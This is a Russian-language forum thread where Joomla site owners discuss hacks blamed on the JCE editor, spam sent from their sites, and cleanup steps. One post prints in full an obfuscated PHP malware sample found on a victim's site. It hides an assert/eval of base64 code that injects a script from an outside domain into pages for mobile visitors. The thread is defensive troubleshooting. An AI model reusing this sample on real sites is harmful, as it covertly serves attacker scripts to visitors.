Идет рассылка с сайта. Движок Джумла 2.5.8

Уже раз 10 обсуждалось на серче эта тема. В кратце - примерно месяц назад некий кулХацер нашел дыру в визуальном редакторе JCE - и пошли массовые взломы Джумлы 1,5 и 2,5 - обновление до последних версий не помогло.

Удалайте его нафиг. Вирусные файлы ищите в папке имидж/сторес/

или по времени создания....

У меня тоже были сломаны пару сайтов, тоже слали спам. Удалил редактор, все почистил - теперь тишина

Если не затруднит, то можно пруф линки на сабж ?:)

Заранее спасибо за любой ответ.

P.S Дыра где нибудь описывается ? Хотца попробовать на своем сайте. Зная дыру, можно с легкостью ее закрыть.

Кстати, имейлы создаются с американскими именами. Срочно Жириновскому нужно писать😂

нада изучить логи и все)) ну и POST логирование включить, все станет ясно без известных дыр в паблике

Нигде толком не описывается, что взломали JCE нашел мой кодер - я и поднял хай... так что дельных пруфов нет

Хостинг только показывает обращения к файлам😡

Вот кстати интересно почитать: Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов

У меня тут /tmp был jos_9bqu.php, посмотри у себя.

С папки /tmp все уже вычистил

если в шаблоне были шеллы - могли недочистить. смотрите логи, вычисляйте злоумышленника, определяйте список используемых ip и раскручивайте по логам активность

---------- Добавлено 22.02.2013 в 15:56 ----------

и на всякий случай уточню - а ftpшный пароль сменили? или исключили ftp посмотрев логи?

Менял и не раз.

Как можно Shell код найти автоматический, перелопатив все файлы ?

Вот сам код:

<?php

$_ = strrev('tressa'); @$_("e\166\141\154\050b\141\163\145\066\064\137\14 4\145\143\157\144\145\050'aWYgKChwcmVnX21hdGNoKCcv dGV4dFwvdm5kLndhcC53bWx8YXBwbGljYXRpb25cL3ZuZC53YX AueGh0bWxcK3htbC9zaScsIEAkX1NFUlZFUlsnSFRUUF9BQ0NF UFQnXSkgfHwgcHJlZ19tYXRjaCgnL2FsY2F0ZWx8YW1vaXxhbm Ryb2lkfGF2YW50Z298YmxhY2tiZXJyeXxiZW5xfGNlbGx8Y3Jp Y2tldHxkb2NvbW98ZWxhaW5lfGh0Y3xpZW1vYmlsZXxpcGhvbm V8aXBhZHxpcGFxfGlwb2R8ajJtZXxqYXZhfG9wZXJhLm1pbml8 bWlkcHxtbXB8bW9iaXxtb3Rvcm9sYXxuZWMtfG5va2lhfHBhbG 18cGFuYXNvbmljfHBoaWxpcHN8cGhvbmV8c2FnZW18c2hhcnB8 c2llLXxzbWFydHBob25lfHNvbnl8c3ltYmlhbnx0LW1vYmlsZX x0ZWx1c3x1cFwuYnJvd3Nlcnx1cFwubGlua3x2b2RhZm9uZXx3 YXB8d2Vib3N8d2lyZWxlc3N8eGRhfHhvb218enRlL3NpJywgQC RfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgfHwgcHJlZ19t YXRjaCgnL21zZWFyY2h8bVw/cT0vc2knLCBAJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddKSkgJi YgIXByZWdfbWF0Y2goJy9tYWNpbnRvc2h8YW1lcmljYXxhdmFu dHxkb3dubG9hZHx3aW5kb3dzXC1tZWRpYVwtcGxheWVyfHlhbm RleHxnb29nbGUvc2knLCBAJF9TRVJWRVJbJ0hUVFBfVVNFUl9B R0VOVCddKSkgeyBlY2hvICc8c2NyaXB0IHNyYz0iaHR0cDovL2 1vYmlsZS1jb250ZW50LmluZm8vanF1ZXJ5LTEuNy4xLmpzIj48 L3NjcmlwdD4nOyBmbHVzaCgpOyBleGl0OyB9'\051\051\073" );

?>

<?php

Вот еще заблокировал в .htaccess бота ezooms.bot@gmail.com Может в нем проблема ? Может не заблокировал полностью.

По логам и до сих пор ломятся.

Видимо бот